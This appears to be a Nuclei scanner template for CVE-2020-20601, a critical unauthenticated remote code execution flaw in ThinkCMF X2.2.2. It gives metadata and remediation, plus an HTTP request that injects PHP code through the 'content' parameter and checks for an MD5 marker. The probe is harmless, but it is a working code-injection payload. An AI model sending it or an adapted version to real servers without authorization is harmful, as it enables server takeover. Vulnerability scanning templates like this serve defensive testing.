id: CVE-2020-20601

info:
  name: ThinkCMF X2.2.2 - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: |
    ThinkCMF X2.2.2 and below contain a remote code execution caused by processing crafted packets, letting attackers execute arbitrary code remotely, exploit requires sending malicious packets.
  impact: |
    Unauthenticated attackers can execute arbitrary PHP code on ThinkCMF servers, leading to complete server compromise and access to all website data.
  remediation: |
    Upgrade to ThinkCMF version X2.2.3 or later.
  reference:
    - https://www.shuzhiduo.com/A/l1dygr36Je/
    - https://blog.riskivy.com/thinkcmf-%e6%a1%86%e6%9e%b6%e4%b8%8a%e7%9a%84%e4%bb%bb%e6%84%8f%e5%86%85%e5%ae%b9%e5%8c%85%e5%90%ab%e6%bc%8f%e6%b4%9e/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-20601
    cwe-id: CWE-94
    epss-score: 0.07598
    epss-percentile: 0.93757
    cpe: cpe:2.3:a:thinkcmf:thinkcmf:x2.2.2:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: thinkcmf
    product: thinkcmf
  tags: cve,cve2020,thinkcmf,rce,vuln,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?g=g&m=Door&a=index&content=<?php%20echo%20md5('ThinkCMF');"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "d9b2c63a497e2f30c4ad9ad083a00691"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f2618f96a001e81a1c9293bab3bbdfa4b8a95f469afe8df7f50a5265cdb4e8cf022100ce83c209da57c3be6b71494e08fdb0c71f2cc38382601a274525de06941b6159:922c64590222798bb761d5b6d8e72950